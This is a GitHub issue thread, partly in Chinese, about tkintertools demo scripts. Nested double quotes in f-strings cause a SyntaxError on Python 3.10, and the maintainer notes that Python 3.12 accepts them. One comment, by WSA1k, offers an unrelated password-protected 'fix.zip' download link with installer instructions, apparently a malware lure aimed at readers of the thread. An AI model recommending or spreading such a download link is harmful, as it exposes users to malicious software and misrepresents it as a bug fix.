### ISSUE TITLE
demo0和demo1存在双引号内使用双引号的bug

### ISSUE THREAD

**Issue by liu9920ai** [Xiaokang2022/tkintertools-demos#3]
### 🔖 Version

Latest stable version (Default)

### 🔥 Platform

Windows 11

### ❓What Happened

demo0第32行和demo1第75行内存在双引号内使用双引号的问题（下方截图为demo1内容），python版本为3.10
![image](https://github.com/user-attachments/assets/eecd5e64-227a-4c4d-8fc4-d5c7c6690060)
运行时会引发报错
![image](https://github.com/user-attachments/assets/118e4bef-49c6-4842-9bd8-3452fa6cb276)
应修改为单引号（下方截图为demo0内容）
![image](https://github.com/user-attachments/assets/5ee22508-f677-46de-9b37-a40fc3437827)
方可正常运行
![image](https://github.com/user-attachments/assets/24ec2896-e5c0-475c-9a77-10136189dc2a)

### 📑 Relevant Log Output

```shell
Traceback (most recent call last):
  File "C:\Users\liu\AppData\Local\Programs\Python\Python310\lib\runpy.py", line 196, in _run_module_as_main
    return _run_code(code, main_globals, None,
  File "C:\Users\liu\AppData\Local\Programs\Python\Python310\lib\runpy.py", line 86, in _run_code
    exec(code, run_globals)
  File "c:\program files\microsoft visual studio\2022\community\common7\ide\extensions\microsoft\python\core\debugpy\__main__.py", line 39, in <module>
    cli.main()
  File "c:\program files\microsoft visual studio\2022\community\common7\ide\extensions\microsoft\python\core\debugpy/..\debugpy\server\cli.py", line 430, in main
    run()
  File "c:\program files\microsoft visual studio\2022\community\common7\ide\extensions\microsoft\python\core\debugpy/..\debugpy\server\cli.py", line 284, in run_file
    runpy.run_path(target, run_name="__main__")
  File "c:\program files\microsoft visual studio\2022\community\common7\ide\extensions\microsoft\python\core\debugpy\_vendored\pydevd\_pydevd_bundle\pydevd_runpy.py", line 320, in run_path
    code, fname = _get_code_from_file(run_name, path_name)
  File "c:\program files\microsoft visual studio\2022\community\common7\ide\extensions\microsoft\python\core\debugpy\_vendored\pydevd\_pydevd_bundle\pydevd_runpy.py", line 294, in _get_code_from_file
    code = compile(f.read(), fname, 'exec')
  File "D:\VS2022\Python\tkintertools-demos\demos\demo1\main.py", line 75
    file=f"./assets/images/{("light", "dark")[theme]}.png")))
                              ^^^^^
SyntaxError: f-string: unmatched '('
Press any key to continue . . .
```

### ✉️ Contact Details

2404521002@qq.com

### ⚠️ Code of Conduct

- [x] I agree to follow this project's Code of Conduct

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Xiaokang2022** [comment]
@liu9920ai 

这在 Python 3.12 上不会引起报错，你可以更改这个引号，也可以尝试将 Python 升级到 3.12 版本。

**Comment by liu9920ai** [comment]
> @liu9920ai
> 
> 这在 Python 3.12 上不会引起报错，你可以更改这个引号，也可以尝试将 Python 升级到 3.12 版本。

如果更改双引号为单引号会使得使用别的版本python的人运行时一次成功，我想这会使得他们心情愉快，当然这只是建议

**Comment by Xiaokang2022** [comment]
@liu9920ai 

目前 demo 是给 tkt 测试版本写的，后续会随时有改动和更新，所以不准备更改，当 tkt 更新到正式版之后，这个问题确实需要解决。

目前我不会对其做出额外的更改。
